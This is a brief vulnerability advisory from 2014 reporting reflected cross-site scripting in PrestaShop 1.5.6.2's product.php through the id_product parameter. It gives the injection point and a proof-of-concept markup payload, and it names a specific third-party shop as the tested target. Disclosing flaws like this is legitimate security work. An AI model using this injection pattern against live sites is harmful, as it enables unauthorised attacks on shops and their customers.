# Cross Site Scripting on E-Commerce PrestaShop
# Risk: Low
# CWE number: CWE-79
# Date: 09/04/2014
# Vendor: www.prestashop.com
# Version: PrestaShop 1.5.6.2
# Author: Felipe "Renzi" Gabriel
# Contact: renzi@linuxmail.org
# Tested on Windows 8 pro
# Vulnerable File: product.php
# Exploit: http:/host//product.php%3fid_product=[xss]
# PoC:
     - Target: www.serviezenenmeer.nl
     - Vuln. File: product.php%3fid_product=
     - Exploit: "><marquee>Vulnerable</marquee>